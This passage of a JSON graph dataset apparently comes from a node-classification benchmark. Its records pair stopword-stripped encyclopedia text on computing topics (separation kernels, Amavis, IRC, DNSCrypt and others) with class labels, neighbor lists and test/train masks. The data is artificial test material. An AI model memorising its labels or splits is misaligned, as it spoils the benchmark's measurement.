      3629,
      9646,
      3887,
      7855,
      1970,
      5433,
      7739,
      4797,
      3262,
      9791,
      3525,
      7368,
      9160,
      5325,
      4435,
      2262,
      6360,
      9688,
      7515,
      4956,
      5469,
      5470,
      3941,
      6373,
      5608,
      107,
      11244,
      2804,
      2041,
      10492,
      5245,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5247,
    "label": 3,
    "text": "Separation_kernel:separation kernel separation kernel type security kernel used simulate distributed environment concept introduced john rushby 1981 paper rushby proposed separation kernel solution difficulties problems arisen development verification large complex security kernels intended provide multilevel secure operation general-purpose multi-user systems according rushby task separation kernel create environment indistinguishable provided physically distributed system must appear regime separate isolated machine information flow one machine another along known external communication lines one properties must prove separation kernel therefore channels information flow regimes explicitly provided variant separation kernel partitioning kernel gained acceptance commercial aviation community way consolidating onto single processor multiple functions perhaps mixed criticality commercial real-time operating system products genre used aircraft manufacturers safety-critical avionics applications 2007 information assurance directorate u.s. national security agency nsa published separation kernel protection profile skpp security requirements specification separation kernels suitable used hostile threat environments skpp describes common criteria parlance class modern products provide foundational properties rushby conceptual separation kernel defines security functional assurance requirements construction evaluation separation kernels yet providing latitude choices available developers skpp defines separation kernel hardware and/or firmware and/or software mechanisms whose primary function establish isolate separate multiple partitions control information flow subjects exported resources allocated partitions separation kernel core functional requirements include separation kernel allocates exported resources control partitions partitions isolated except explicitly allowed information flows actions subject one partition isolated viz. detected communicated subjects another partition unless flow allowed partitions flows defined configuration data note 'partition 'subject orthogonal abstractions 'partition indicated mathematical genesis provides set-theoretic grouping system entities whereas 'subject allows us reason individual active entities system thus partition collection containing zero elements subject active element may contain zero subjects separation kernel provides hosted software programs high-assurance partitioning information flow control properties tamperproof non-bypassable capabilities provide configurable trusted foundation variety system architectures september 2008 integrity-178b green hills software became first separation kernel certified skpp wind river systems separation kernel technology active certification process 2009 2011 information assurance directorate sunset skpp nsa longer certify specific operating systems including separation kernels skpp noting conformance protection profile offer sufficient confidence national security information appropriately protected context larger system conformant product integrated sel4 microkernel formal proof configured separation kernel proof information flow enforcement together implies high level assurance usecase muen separation kernel also formally verified open source separation kernel x86 machines",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      6438,
      10235,
      2345,
      7983,
      3248,
      7217,
      4914,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      3652,
      8388,
      1350,
      4423,
      8136,
      2761,
      8904,
      9932,
      7887,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      1776,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 5248,
    "label": 0,
    "text": "James_F._Allen:james f. allen james frederick allen born 1950 computational linguist recognized contributions temporal logic particular allen interval algebra interested knowledge representation commonsense reasoning natural language understanding believing deep language understanding currently achieved significant hand-engineering semantically-rich formalisms coupled statistical preferences john h. dessaurer professor computer science university rochester allen received ph.d. university toronto 1979 supervision c. raymond perrault joined faculty rochester rochester department chair 1987 1990 directed cognitive science program 1992 1996 co-directed center sciences language 1996 1998 served editor-in-chief computational linguistics 1983-1993 since 2006 also associate director florida institute human machine cognition trips project long-term research build generic technology dialogue spoken 'chat systems includes natural language processing collaborative problem solving dynamic context-sensitive language modeling contrast data driven approaches machine learning requires collect annotate corpora i.e training data firstly plow agent system learns executable task models single collaborative learning session integrates wide ai technologies include deep natural language understanding knowledge representation reasoning dialogue systems planning/agent-based systems machine learning paper outstanding paper award aaai 2007 allen author textbook natural language understanding benjamin-cummings 1987 2nd ed. 1995 also co-author henry kautz richard pelavin josh tenenberg reasoning plans morgan kaufmann 1991 1991 elected fellow association advancement artificial intelligence 1990 founding fellow 1992 became dessaurer professor rochester",
    "neighbors": [
      1890,
      7780,
      1641,
      2578,
      1783
    ],
    "mask": "None"
  },
  {
    "node_id": 5249,
    "label": 4,
    "text": "Amavis:amavis amavis open-source content filter electronic mail implementing mail message transfer decoding processing checking interfacing external content filters provide protection spam viruses malware considered interface mailer mta mail transfer agent one content filters amavis used notable features common mail filtering installation amavis consists postfix mta spamassassin spam classifier clamav anti-virus protection running unix-like operating system many virus scanners 30 spam scanners crm114 dspam bogofilter supported well mtas three topologies interfacing mta supported amavisd process sandwiched two instances mta yielding classical after-queue mail filtering setup amavisd used smtp proxy filter before-queue filtering setup amavisd process consulted provide mail classification forward mail message case consulting client remains charge mail forwarding last approach used milter setup limitations historical client program amavisd-submit since version 2.7.0 before-queue setup preferred allows mail message transfer rejected smtp session sending client after-queue setup filtering takes place mail message already received enqueued mta case mail filter longer reject message deliver possibly tagged discard generate non-delivery notification cause unwanted backscatter case bouncing message fake sender address disadvantage before-queue setup requires resources cpu memory proportional current peak mail transfer rate unlike after-queue setup delay acceptable resource usage corresponds average mail transfer rate introduction option smtpd_proxy_options=speed_adjust postfix 2.7.0 resource requirements before-queue content filter much reduced countries legislation permit mail filtering discard mail message accepted mta rules after-queue filtering setup discarding quarantining messages leaves possibility delivering possibly tagged messages rejecting before-queue setup smtp proxy milter amavis receive mail messages mta one sockets protocol families pf_inet ipv4 pf_inet6 ipv6 pf_local unix domain socket using protocols esmtp lmtp simple private protocol am.pdp used helper program like amavisd-milter interface milters output side protocols esmtp lmtp used pass message back-end mta instance lda message passed spawned process unix pipe esmtp lmtp used session optionally encrypted using tls starttls rfc 3207 extension protocol smtp command pipelining rfc 2920 supported client server code spam scanning enabled daemon process amavisd conceptually similar spamd process spamassassin project cases forked child processes call spamassassin perl modules directly hence performance similar main difference protocols used amavis typically speaks standard esmtp protocol mta spamc/spamd case mta typically spawns spamc program passing message unix pipe spamc process transfers message spamd daemon using private protocol spamd calls spamassassin perl modules design priorities amavisd-new called amavis reliability security adherence standards performance functionality intention mail message could lost due unexpected events like i/o failures resources depletion unexpected program terminations amavisd program meticulously checks completion status every system call i/o operation unexpected events logged possible handled several layers event handling amavis never takes responsibility mail message delivery away mta final success status reported mta message passed back-end mta instance reception confirmed case fatal failures processing transferring message message processed stays queue front-end mta instance re-tried later approach also covers potential unexpected host failures crashes amavisd process one components use program resources like memory size file descriptors disk usage creation subprocesses controlled large mail messages kept memory available memory size impose limit size mail messages processed memory resources wasted unnecessarily great deal attention given security aspects required handling potentially malicious nonstandard garbled data mail messages coming untrusted sources process handling mail messages runs reduced privileges dedicated user id optionally run chroot-ed risks buffer overflows memory allocation bugs largely avoided implementing protocol handling mail processing perl handles dynamic memory management transparently care taken content processed messages inadvertently propagate system perl provides additional security safety net marking tainted data originating wild amavis careful put perl feature good use avoiding automatic untainting data use taint untainting explicitly strategic points late data flow amavis use several external programs enhance functionality de-archivers de-compressors virus scanners spam scanners programs often implemented languages like c c++ potential risk mail message passed one programs cause failure even open security hole risk limited running programs unprivileged user id possibly chroot-ed nevertheless external programs like unmaintained de-archivers avoided use external programs configurable disabled selectively group like decoders virus scanners despite implemented interpreted programming language perl amavis slow good performance functionality implemented amavis speaking external components achieved dealing data large chunks e.g line-by-line avoiding unnecessary data copying optimizing frequently traversed code paths using suitable data structures algorithms well low-level optimizations bottlenecks detected development profiling code benchmarking detailed timing report log help recognize bottlenecks particular installation certain external modules programs like spamassassin command-line virus scanners slow using would constitute vast majority elapsed time processing resources making resources used amavis proportionally quite small components like external mail decoders virus scanners spam scanners selectively disabled needed remains functionality implemented amavis like transferring mail message mta using smtp lmtp protocol checking mail header section validity checking banned mail content types verifying generating dkim signatures consequence mail processing tasks like dkim signing verification mail checking disabled exceptionally fast rival implementations compiled languages even full checks using fast virus scanner spam scanning disabled surprisingly fast implementation protocols message structures closely follows set applicable standards rfc 5322 rfc 5321 rfc 2033 rfc 3207 rfc 2045 rfc 2046 rfc 2047 rfc 3461 rfc 3462 rfc 3463 rfc 3464 rfc 4155 rfc 5965 rfc 6376 rfc 5451 rfc 6008 rfc 4291 several cases functionality re-implemented amavis code even though public cpan perl module exists lacks attention detail following standard lacks sufficient checking handling errors amavis licensed gplv2 license applies current code well historical branches exception supporting programs like monitoring statistics reporting covered new bsd license project started 1997 unix shell script detect block e-mail messages containing virus intended block viruses mta mail transfer agent lda local delivery stage running unix-like platform complementing virus protection mechanisms running end-user personal computers next tool re-implemented perl program later evolved daemonized process dozen developers took turns first five years project developing several variants keeping common goal project name development infrastructure since december 2008 2018-10-09 active branch officially amavisd-new developed maintained mark martinec since march 2002 agreed developers time private correspondence christian bricart lars hecking hilko bengen rainer link mark martinec project name amavis largely interchangeable name amavisd-new branch lots functionality added years like adding protection spam unwanted content besides original virus protection focus kept reliability security adherence standards performance domain amavis.org use project registered 1998 christian bricart one early developers still maintaining domain name registration domain entirely dedicated active branch project mailing list moved sourceforge amavis.org march 2011 hosted ralf hildebrandt patrick ben koetter project web page main distribution site located jožef stefan institute ljubljana slovenia handover 2018 development taking place years 2002 2018 october 9 2018 mark martinec announced general support discussion mailing list retirement project also patrick ben koetter continue new project leader patrick notified migration source code public gitlab repository plan next steps regarding project development history project name project branches varied somewhat initially spelling project name amavis mail virus scanner introduced christian bricart rewrite perl name program amavis-perl daemonized versions initially distributed name amavisd-snapshot amavisd modular rewrite hilko bengen called amavis-ng march 2002 amavisd-new branch introduced mark martinec initially patch amavisd-snapshot-20020300 later evolved self-contained project surviving actively maintained branch nowadays project name preferably spelled amavis name program amavisd name amavis mostly interchangeable amavisd-new hilko bengen",
    "neighbors": [
      5253,
      8582,
      9222,
      3988,
      5397,
      1305,
      7325,
      10276,
      6313,
      1837,
      4398,
      7983,
      10413,
      2045,
      7347,
      8499,
      9909,
      950,
      9014,
      4793,
      1594,
      7739,
      3133,
      1474,
      4294,
      7764,
      11610,
      7515,
      5469,
      5470,
      7518,
      11492,
      2281,
      1771,
      8941,
      4464,
      9588,
      3837
    ],
    "mask": "Test"
  },
  {
    "node_id": 5250,
    "label": 8,
    "text": "Sambar_Server:sambar server jibin server combined http https xmpp ftp smtp pop3 dns dhcp java servlet jsp proxy server developed tod sambar proxy server provided also dial-on-demand service internet service provider limited shareware version widely distributed full functionality available commercial version initially developed microsoft windows platform later version linux also available releases still downloadable free various software distribution sites windows version need server operation system ran even windows 95 windox xp home sambar server came server-side scripting language called cscript derived programming language c. first release appeared 1996/97 latest release 7.0 published march 2007 runs xp win 10 tod sambar claims commercial shareware freeware licensees numbered 200,000 server powered 13,000 commercial internet sites peak end 2007 tod sambar announced end development least october 2015 sambar server still use testified sambar webmaster community forum domain www.sambar.com sambar sever distributed serviced still registered tod sambar name connected internet two mx records registered dns domain name system",
    "neighbors": [
      5281,
      10242,
      7364,
      2887,
      4797,
      5738,
      6797,
      2996,
      4725,
      9780,
      823,
      9909,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5251,
    "label": 5,
    "text": "Internet_Relay_Chat:internet relay chat internet relay chat irc application layer protocol facilitates communication form text chat process works client/server networking model irc clients computer programs users install system web based applications running either locally browser 3rd party server clients communicate chat servers transfer messages clients irc mainly designed group communication discussion forums called channels also allows one-on-one communication via private messages well chat data transfer including file sharing client software available every major operating system supports internet access april 2011 top 100 irc networks served half million users time hundreds thousands channels operating total roughly 1,500 servers roughly 3,200 servers worldwide irc usage declining steadily since 2003 losing 60 users 1 million 400,000 2012 half channels half million 2003 irc created jarkko oikarinen august 1988 replace program called mut multiuser talk bbs called oulubox university oulu finland working department information processing science jarkko intended extend bbs software administered allow news usenet style real time discussions similar bbs features first part implemented chat part borrowed parts written friends jyrki kuoppala jukka pihl first irc network running single server named tolsun.oulu.fi oikarinen found inspiration chat system known bitnet relay operated bitnet jyrki kuoppala pushed jarkko ask oulu university free irc code also could run outside oulu finally got released jyrki kuoppala immediately installed another server first irc network jarkko got friends helsinki university tampere university start running irc servers number users increased universities soon followed time jarkko realized rest bbs features probably would n't fit program jarkko got touch people university denver oregon state university irc network running wanted connect finnish network obtained program one jarkko friends vijay subramaniam—the first non-finnish person use irc irc grew larger got used entire finnish national network—funet—and connected nordunet scandinavian branch internet november 1988 irc spread across internet middle 1989 40 servers worldwide august 1990 first major disagreement took place irc world a-net anarchy net included server named eris.berkeley.edu open required passwords limit number connects greg wumpus lindahl explains wildcard server line people hooking servers nick-colliding everyone eris free network efnet made eris machine first q-lined q quarantine irc wumpus words eris refused remove line formed efnet n't much fight got hubs join almost everyone else got carried along a-net formed eris servers efnet formed non-eris servers history showed servers users went efnet anet disbanded name efnet became meaningless one irc network around time irc used report 1991 soviet coup d'état attempt throughout media blackout previously used similar fashion gulf war chat logs events kept ibiblio archive another fork effort first really made big lasting difference initiated 'wildthang u.s. october 1992 forked efnet ircd version 2.8.10 meant test network develop bots quickly grew network friends friends europe canada separate new network worked december french servers connected canadian ones end month french canadian network connected us one forming network later came called undernet undernetters wanted take ircd attempt make less bandwidth consumptive try sort channel chaos netsplits takeovers efnet started suffer latter purpose undernet implemented timestamps new routing offered cservice—a program allowed users register channels attempted protect troublemakers first server list presented february 15 1993 includes servers usa canada france croatia japan august 15 new user count record set 57 users may 1993 rfc 1459 published details simple protocol client/server operation channels one-to-one one-to-many conversations notable significant number extensions like ctcp colors formats included protocol specifications character encoding led various implementations servers clients diverge fact software implementation varied significantly one network network implementing policies standards code bases summer 1994 undernet forked new network called dalnet named founder dalvenjah formed better user service user channel protections one significant changes dalnet use longer nicknames original ircd limit 9 letters dalnet ircd modifications made alexei lefler kosut dalnet thus based undernet ircd server although dalnet pioneers efnet abandoners according james ng initial dalnet people ops startrek sick constant splits/lags/takeovers/etc dalnet quickly offered global wallops ircop messages seen users +w /mode nickname +w longer nicknames q lined nicknames nicknames used i.e chanserv ircop nickserv etc global k lines ban one person entire domain server entire network ircop communications globops +h mode showing ircop helpop etc much dalnet new functions written early 1995 brian morpher smith allow users nicknames control channels send memos july 1996 months flame wars discussions mailing list yet another split due disagreement development ircd evolve notably european servers europe side later named ircnet argued nick channel delays efnet side argued timestamps also disagreements policies european side started establish set rules directing ircops could could point view opposed us side ircnet servers europe efnet servers us event also known great split many irc societies efnet since august 1998 grown passed number users northern autumn year 2000 efnet 50,000 users ircnet 70,000 golden era 1990s early 2000s 240,000 users quakenet 2004 irc seen significant decline losing around 60 users 2003 2012 users moving modern social media platforms like facebook twitter also open platforms like xmpp developed 1999 certain networks like freenode followed overall trend quadrupled size period 2016 freenode largest irc network around 90,000 users 2016 new standardization effort way working group called ircv3 focuses advanced client features like instant notifications better history support improved security.. 2019 major irc networks fully adopted proposed standard irc open protocol uses tcp optionally tls irc server connect irc servers expand irc network users access irc networks connecting client server many client implementations mirc hexchat irssi server implementations e.g original ircd irc servers require users register account nick nickname required connected irc originally plain text protocol although later extended request assigned port 194/tcp iana however de facto standard always run irc 6667/tcp nearby port numbers example tcp ports 6660–6669 7000 avoid run ircd software root privileges protocol specified characters 8-bit specify character encoding text supposed use cause problems users using different clients and/or different platforms want converse client-to-server irc protocols use today descended protocol implemented irc2.4.0 version irc2 server documented rfc 1459 since rfc 1459 published new features irc2.10 implementation led publication several revised protocol documents rfc 2810 rfc 2811 rfc 2812 rfc 2813 however protocol changes widely adopted among implementations although many specifications irc protocol published official specification protocol remains dynamic virtually clients servers rely strictly rfcs reference microsoft made extension irc 1998 via proprietary ircx later stopped distributing software supporting ircx instead developing proprietary msnp standard structure network irc servers tree messages routed along necessary branches tree network state sent every server generally high degree implicit trust servers architecture number problems misbehaving malicious server cause major damage network changes structure whether intentional result conditions underlying network require net-split net-join results lot network traffic spurious quit/join messages users temporary loss communication users splitting servers adding server large network means large background bandwidth load network large memory load server established however message multiple recipients delivered fashion similar multicast meaning message travels network link exactly strength comparison non-multicasting protocols simple mail transfer protocol smtp extensible messaging presence protocol xmpp irc daemon also used local area network lan irc thus used facilitate communication people within local area network internal communication irc line-based structure clients send single-line messages server receive replies messages receive copies messages sent clients clients users enter commands prefixing '/ depending command may either handled entirely client generally commands client recognize passed directly server possibly modification due nature protocol automated systems always correctly pair sent command reply full reliability subject guessing basic means communicating group users established irc session channel channels network displayed using irc command list lists currently available channels modes +s +p set particular network users join channel using join command clients available /join channelname messages sent joined channels relayed users channels available across entire irc network prefixed local server use less common channel types include '+ channels—'modeless channels without operators — channels form timestamped channel normally non-timestamped networks users channels may modes represented single case-sensitive letters set using mode command user modes channel modes separate use letter mean different things e.g user mode invisible mode channel mode invite modes usually set unset using mode command takes target user channel set modes set unset parameters modes need channel modes take parameters channel modes apply user channel add remove mask e.g ban mask list associated channel rather applying channel whole modes apply users channel associated symbol used represent mode names replies sent clients first joining channel use names command many clients also used represent client displayed list users channel display indicator user modes order correctly parse incoming mode messages track channel state client must know mode type modes apply user channel symbol goes letter early implementations irc hard-coded client de facto standard extension protocol called isupport sends information client connect time using numeric 005 small design fault irc regarding modes apply users channels names message used establish initial channel state send one mode per user channel multiple modes set single user example user holds operator status +o voice status +v channel new client unable see mode less priority i.e voice workarounds possible client server side none widely implemented many daemons networks added extra modes modified behavior modes list channel operator client irc channel manages channel irc channel operators easily seen symbol icon next name varies client implementation commonly symbol prefix green circle latin letter +o networks operator also users maintain elevated rights local server entire network called irc operators sometimes shortened ircops opers confused channel operators implementation ircd varies privileges irc operator given ircd rfc 1459 claims irc operators necessary evil keep clean state network need able disconnect reconnect servers additionally prevent malicious users even harmful automated programs entering irc irc operators usually allowed disconnect clients completely ban ip addresses complete subnets networks carry services nickserv et al usually allow irc operators also handle basic ownership matters privileged rights may include overriding channel bans able join channels would allowed join opered able op channels would able without opered auto-opped channels always forth hostmask unique identifier irc client connected irc server irc servers services clients including bots use identify specific irc session format hostmask codice_1 hostmask looks similar confused e-mail address nick part nickname chosen user may changed connected user part username reported ident client ident available client username specified client connected used prefixed tilde host part hostname client connecting ip address client resolved valid hostname server used instead hostname privacy implications exposing ip address hostname client irc daemons also provide privacy features inspircd unrealircd +x mode hashes client ip address masks part client hostname making unreadable users ircops users may also option requesting virtual host vhost displayed hostmask allow anonymity irc networks freenode use cloaks indicate user affiliated group project issues original design irc amount shared state data limitation scalability absence unique user identifications leading nickname collision problem lack protection netsplits means cyclic routing trade-off scalability sake real-time user presence information protocol weaknesses providing platform abuse transparent optimizable message passing encryption issues addressed modern irc irc connections usually unencrypted typically span long time periods attractive target dos/ddos attackers hackers careful security policy necessary ensure irc network susceptible attack takeover war irc networks may also k-line g-line users servers harming effect irc servers support ssl/tls connections security purposes helps stop use packet sniffer programs obtain passwords irc users little use beyond scope due public nature irc channels ssl connections require client server support may require user install ssl binaries irc client specific patches modules computers networks also use ssl server server connections provide special channel flag codice_2 allow ssl-connected users channel disallowing operator identification clear text better utilize advantages ssl provides irc served early laboratory many kinds internet attacks using fake icmp unreachable messages break tcp-based irc connections nuking annoy users facilitate takeovers one contentious technical issues surrounding irc implementations survives day merit nick/channel delay vs. timestamp protocols methods exist solve problem denial-of-service attacks take different approaches problem original irc protocol implemented two servers split rejoined two sides network would simply merge channels user could join split server channel existed side network empty gain operator status would become channel operator combined channel netsplit ended user took nickname existed side network server would kill users rejoining i.e. 'nick-collision often abused mass-kill users channel thus creating opless channels operators present deal abuse apart causing problems within irc encouraged people conduct denial service attacks irc servers order cause netsplits would abuse nick/channel delay abbreviated nd/cd solution problem simple user signs nickname becomes available channel ceases exist users parted often happens netsplit server allow user use nickname join channel certain period time delay passed idea behind even netsplit occurs useless abuser take nickname gain operator status channel thus collision nickname 'merging channel occur extent inconveniences legitimate users might forced briefly use different name rejoining appending underscore popular alternative timestamp ts protocol takes different approach every nickname channel network assigned timestampthe date time created netsplit occurs two users side free use nickname channel two sides joined one survive case nicknames newer user according ts killed channel collides members users channel merged channel operators losing side split lose channel operator status ts much complicated protocol nd/cd design implementation despite gone several revisions implementations still problems desyncs two servers network disagree current state network allowing much leniency allowed 'losing side original ts protocols example protection users setting bans modes losing channel would merged split rejoined even though users set modes lost channel operator status modern ts-based irc servers also incorporated form nd and/or cd addition timestamping attempt curb abuse networks today use timestamping approach timestamp versus nd/cd disagreements caused several servers split away efnet form newer ircnet split efnet moved ts protocol ircnet used nd/cd recent versions ircnet ircd well ircds using ts6 protocol including charybdis nd extended/replaced mechanism called save mechanism assigns every client uid upon connecting irc server id starts number forbidden nicks although ircds namely ircnet inspircd allow clients switch uid nickname two clients nickname join different sides netsplit nick collision first server see collision force clients change nick uid thus saving clients disconnected ircnet nickname also locked time nd prevent clients changing back original nickname thus colliding thousands running irc networks world run various implementations irc servers administered various groups irc operators protocol exposed irc users similar irc networks accessed client software although might slight incompatibilities limited functionality due differing server software implementations largest irc networks traditionally grouped big four designation networks top statistics big four networks change periodically due community nature irc large number networks users choose historically big four irc reached 6 million simultaneous users 2001 10 million users 2003 dropping 371k 2018 october 2018 largest irc networks today top 100 irc networks around 370k users connected peak hours three recognized uniform resource identifier uri schemes internet relay chat codice_3 codice_4 codice_5 supported allow hyperlinks various forms including items enclosed within brackets optional used necessary connect specified host network known irc client join specified channel used within client another application web browser irc default uri irc6 specifies connection made using ipv6 ircs specifies secure connection per specification usual hash symbol prepended channel names begin alphanumeric character—allowing omitted implementations example mirc unconditionally resulting usually unintended extra example channel included url implementations allow multiple channels specified separated commas client software exists various operating systems software packages well web-based inside games many different clients available various operating systems including windows unix linux mac os x mobile operating systems ios android windows mirc one popular clients programs extensible plug-ins also serve platforms irc clients instance client called erc written entirely emacs lisp included v.22.3 emacs therefore platform run emacs run erc number web browsers built-in irc clients opera version 12.18 earlier chatzilla add-on mozilla firefox included built-in component seamonkey web-based clients mibbit open source kiwiirc run browsers games war§ow unreal tournament unreal tournament 2004 uplink spring engine -based games 0 a.d. zdaemon included irc ustream chat interface irc custom authentication well twitch.tv formerly justin.tv typical use bots irc provide irc services specific functionality within channel host chat-based game provide notifications external events however irc bots used launch malicious attacks denial service spamming exploitation program runs daemon server functions persistent proxy known bnc bouncer purpose maintain connection irc server acting relay server client simply act proxy client lose network connectivity bnc may stay connected archive traffic later delivery allowing user resume irc session without disrupting connection server furthermore way obtaining bouncer-like effect irc client typically text-based example irssi may run always-on server user connects via ssh also allows devices ssh functionality actual irc client installed connect irc allows sharing irc sessions keep irc client quitting ssh connection closes client run inside terminal multiplexer gnu screen tmux thus staying connected irc network constantly able log conversation channels user interested maintain channel presence network modelled setup 2004 irc client following client-server model called smuxi launched numerous search engines available aid user finding looking irc generally search engine consists two parts back-end spider/crawler front-end search engine back-end spider/webcrawler work horse search engine responsible crawling irc servers index information sent across information indexed usually consists solely channel text text publicly displayed public channels storage method usually sort relational database like mysql oracle front-end search engine user interface database supplies users way search database indexed information retrieve data looking front-end search engines also coded numerous programming languages search engines spider single application responsible crawling irc indexing data however others user based indexers latter rely users install add-on irc client add-on sends database channel information whatever channels user happens many users implemented ad hoc search engines using logging features built many irc clients search engines usually implemented bots dedicated particular channel group associated channels irc changed much life internet new server software added multitude new features effort standardization adding new features irc protocol ircv3 working group irc still lacks single globally accepted standard convention transmit characters outside 7-bit ascii repertoire irc servers normally transfer messages client another client byte sequences without interpretation recoding characters irc protocol unlike e.g mime http lacks mechanisms announcing negotiating character encoding options put responsibility choosing appropriate character codec client practice irc channels largely used character encodings also used operating systems particular unix derivatives respective language communities today utf-8 encoding unicode/iso 10646 would likely contender single future standard character encoding irc communication standard ever relaxed 510-byte message size restriction utf-8 ascii compatible covers superset commonly used coded character set standards much like conventional p2p file sharing users create file servers allow share files using customised irc bots scripts irc client often users group together distribute warez via network irc bots technically irc provides file transfer mechanisms file sharing implemented irc clients typically using direct client-to-client dcc protocol file transfers negotiated exchange private messages clients vast majority irc clients feature support dcc file transfers hence view file sharing integral feature irc commonplace usage protocol however sometimes also causes dcc spam dcc commands also used exploit vulnerable clients performing action disconnecting server exiting client",
    "neighbors": [
      10242,
      1036,
      3610,
      10269,
      10271,
      3105,
      35,
      2085,
      4133,
      6184,
      1581,
      3629,
      562,
      8758,
      3133,
      5181,
      7239,
      8265,
      4687,
      5199,
      6231,
      3675,
      10341,
      10344,
      9834,
      1643,
      2156,
      4725,
      3191,
      5760,
      8320,
      5251,
      4229,
      649,
      9868,
      6797,
      11408,
      3218,
      8341,
      9365,
      11413,
      3228,
      3742,
      9380,
      9381,
      3751,
      3752,
      10924,
      6319,
      7861,
      9909,
      6330,
      700,
      4797,
      8386,
      5316,
      2245,
      7364,
      6855,
      2760,
      1738,
      5843,
      3284,
      7384,
      4318,
      3812,
      8432,
      2804,
      11509,
      7928,
      8443,
      4863,
      3847,
      4883,
      5397,
      3350,
      10005,
      5402,
      9511,
      7983,
      9519,
      823,
      5437,
      6982,
      2887,
      2892,
      6993,
      2387,
      2904,
      11610,
      4956,
      5469,
      5470,
      5471,
      5472,
      9572,
      5477,
      11112,
      2409,
      5482,
      7022,
      367,
      8558,
      3956,
      5492,
      3959,
      2945,
      3460,
      3462,
      6534,
      8582,
      9097,
      4490,
      1942,
      5531,
      2996,
      1467,
      10171,
      3006,
      7104,
      8640,
      8644,
      8137,
      2509,
      9167,
      3030,
      5078,
      4068,
      6628,
      10727,
      5612,
      493,
      4085,
      6651,
      10748,
      3581
    ],
    "mask": "None"
  },
  {
    "node_id": 5252,
    "label": 4,
    "text": "DataGravity:datagravity datagravity inc. industry data management company produced security software company founded april 2012 paula long john joseph company raised 92m charles river ventures general catalyst andreessen horowitz accel partners datagravity announced first products vmworld 2014 best show new technology awards event began shipping first products october 2014 company focused protection security data stored array named new type storage data-aware storage publicly changed product strategy february 2016 data storage appliances software solution focused behavioral data security product strategy change resulted multiple rounds layoffs multiple reports use conflicting terminology final fate company reports say hytrust acquired datagravity reports including press release issued hytrust say hytrust acquired assets datagravity signed liquidator hytrust told fortune founder ceo paula long left datagravity weeks transaction announced co-founder john joseph left time according reports datagravity ceased day-to-day operations june 2017 cancelled employee benefit plans signed company liquidator barry kallander kallander group one report correspondence datagravity president barry kallander states corporation sold assets company ... unfortunately common shares worthless conversely datagravity cto david siles quoted saying company shut transaction n't fire sale acquired complete vision add value customers love together offer compelling offering marketplace solving pressing needs many enterprises approximately 20 former datagravity employees joined hytrust support datagravity product integration led former datagravity cto david siles datagravity products remain part hytrust portfolio cloudadvisor suite",
    "neighbors": [
      7563
    ],
    "mask": "None"
  },
  {
    "node_id": 5253,
    "label": 9,
    "text": "Waterbed_theory:waterbed theory waterbed theory observation ascribed larry wall systems human computer languages contain minimum amount complexity attempting push complexity system one place invariably cause complexity pop elsewhere behavior likened waterbed mattress contains certain amount water possible push mattress one place displaced water always cause mattress rise elsewhere water compress impossible push waterbed everywhere volume water remains constant waterbed theory cited significant part design philosophy perl 6",
    "neighbors": [
      5249,
      11492,
      4294,
      8262,
      8582,
      2281,
      6313,
      8941,
      4398,
      3988,
      7764,
      9014,
      11610,
      7518
    ],
    "mask": "None"
  },
  {
    "node_id": 5254,
    "label": 5,
    "text": "DNSCrypt:dnscrypt dnscrypt network protocol authenticates encrypts domain name system dns traffic user computer recursive name servers originally designed frank denis yecheng fu although multiple client server implementations exist protocol never proposed internet engineering task force ietf way request comments rfc dnscrypt wraps unmodified dns traffic client dns resolver cryptographic construction order detect forgery though n't provide end-to-end security protects local network man-in-the-middle attacks also mitigates udp-based amplification attacks requiring question least large corresponding response thus dnscrypt helps prevent dns spoofing dnscrypt also used access control done comodo cdome shield product addition private deployments dnscrypt protocol adopted several public dns resolvers vast majority members opennic network well virtual private network vpn services opendns part cisco announced first public dns service supporting dnscrypt december 2011 shortly followed cloudns australia march 29 2016 yandex announced support dnscrypt protocol public dns servers well web browser later infoblox announced activetrust cloud leveraging dnscrypt secure dns communications october 2016 adguard added dnscrypt dns filtering module users could move isps custom adguard dns servers online privacy ad blocking quad9 public dns resolver service run not-for-profit organization contributed ibm packet clearing house global cyber alliance announced support dnscrypt september 2018 servers support secure protocol mentioned dnscrypt creators ’ list dnscrypt used either udp tcp cases default port 443 even though protocol radically differs https instead relying trusted certificate authorities commonly found web browsers client explicitly trust public signing key chosen provider public key used verify set certificates retrieved using conventional dns queries certificates contain short-term public keys used key exchange well identifier cipher suite use clients encouraged generate new key every query servers encouraged rotate short-term key pairs every 24 hours queries responses encrypted using algorithm padded multiple 64 bytes order avoid leaking packet sizes udp response would larger question leading server respond short packet whose tc truncated bit set client retry using tcp increase padding subsequent queries versions 1 2 protocol use x25519 algorithm key exchange eddsa signatures well xsalsa20-poly1305 xchacha20-poly1305 authenticated encryption dnscrypt protocol also used access control accounting accepting predefined set public keys used commercial dns services identify customers without rely ip addresses",
    "neighbors": [
      4224,
      138,
      1297,
      8211,
      11413,
      1692,
      9117,
      3742,
      10908,
      2848,
      5536,
      8615,
      3625,
      4268,
      10924,
      2228,
      8630,
      4793,
      3643,
      8640,
      3777,
      8130,
      2884,
      3781,
      2887,
      8265,
      6098,
      8283,
      2661,
      3941,
      10341,
      9193,
      6513,
      4725,
      5749,
      503,
      5372,
      5887
    ],
    "mask": "None"
  },
  {
    "node_id": 5255,
    "label": 8,
